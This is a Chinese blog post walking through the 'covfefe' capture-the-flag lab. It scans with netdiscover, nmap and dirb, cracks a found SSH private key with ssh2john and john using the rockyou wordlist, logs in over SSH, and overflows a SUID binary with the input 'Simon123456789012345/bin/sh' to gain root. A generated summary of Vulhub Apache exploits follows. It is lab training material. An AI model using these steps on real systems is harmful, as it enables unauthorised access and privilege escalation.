covfefe靶场练习

本文介绍了在covfefe靶场中进行网络扫描和开放服务探测的过程。使用netdiscover和nmap扫描IP,通过dirb寻找隐藏页面,利用ssh2john转换密钥并用john解密,最终通过SSH登录并获取权限,揭示了渗透测试中的关键步骤和技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

对于covfefe靶场,在安装的时候一定要注意网络设置,不然netdiscover可能会扫描不到!!

  • 挖掘开放服务信息    对于只是给定一个对应ip地址的靶场机器,我们需要对其进行扫描,探测开放的服务,渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
    • 探测靶场
      • sudo su -
      • netdiscover -r 192.168.1.1/24
    • nmap -sV 192.168.1.102

 

  • 探测大端口的信息,对于开放http服务的大端口,可采取http://ip:port/ 的形式访问
    查看源代码获取对应的信息,如果没有flag信息,使用工具探测隐藏页面
    • 对这个服务的隐藏文件进行探测 dirb http://ip:port/
    • 使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息
      • 找到ssh2john  locate ssh2john
      • ssh2john id_rsa > rsacrack
        • python /usr/share/john/ssh2john.py  id_rsa > rsacrack
      • 利用字典解密isacrack信息
        • zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
          • 找到密码 starwars
    • 分离用户名、利用ssh登录服务器
      • ssh -i id_rsa 用户名@ssh 靶场机器IP地址
        • ssh -i id_rsa simon@192.168.1.102
          • 密码 starwars
      • 查看路径 pwd
      • 查看文件 ls
      • cd /root
      • ls
      • cat flag.txt  被拒绝,需要提升权限
      • 查看具有root权限的文件  find / -perm -4000 2>/dev/null
      • 运行c文件 read_message
        • cat read_message.c
          • 看到里面有flag提示
        •  read_message
        • 通过溢出代码访问到加权文件超过20个字符,进入root权限
          • 输入  Simon123456789012345/bin/sh
          • 查看角色信息权限    whoami
        • cat flag.txt

 

 

 

-------------------------------------------------------------------------------------------

回答: Vulhub靶场是一个用于漏洞学习和实践的平台,提供了各种常见漏洞的环境供用户进行实验和学习。在Vulhub靶场中,你可以学习和实践Apache换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞(apache_parsing_vulnerability)以及Apache ssl远程命令执行漏洞(ssi-rce)等漏洞。这些漏洞都有相应的漏洞描述、漏洞原理和漏洞利用方法。其中,Apache换行解析漏洞是指通过利用Apache服务器对换行符的解析不当,导致攻击者可以执行任意命令。Apache多后缀解析漏洞是指Apache服务器对文件后缀解析不当,导致攻击者可以执行任意代码。Apache ssl远程命令执行漏洞是指Apache服务器在处理SSI(Server Side Includes)时存在远程命令执行漏洞。在Vulhub靶场中,你可以通过写入webshell、写入cron或ssh key等文件以及写入jar或jetty.xml等库和配置文件等方法来利用这些漏洞。具体的操作方法可以参考相关的参考资料。 #### 引用[.reference_title] - *1* [vulhub靶场练习——Apache换行解析、多后缀解析、以及ssl远程命令执行漏洞分析](https://blog.youkuaiyun.com/qq_38632151/article/details/103287260)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞](https://blog.youkuaiyun.com/qq_38632151/article/details/102975086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值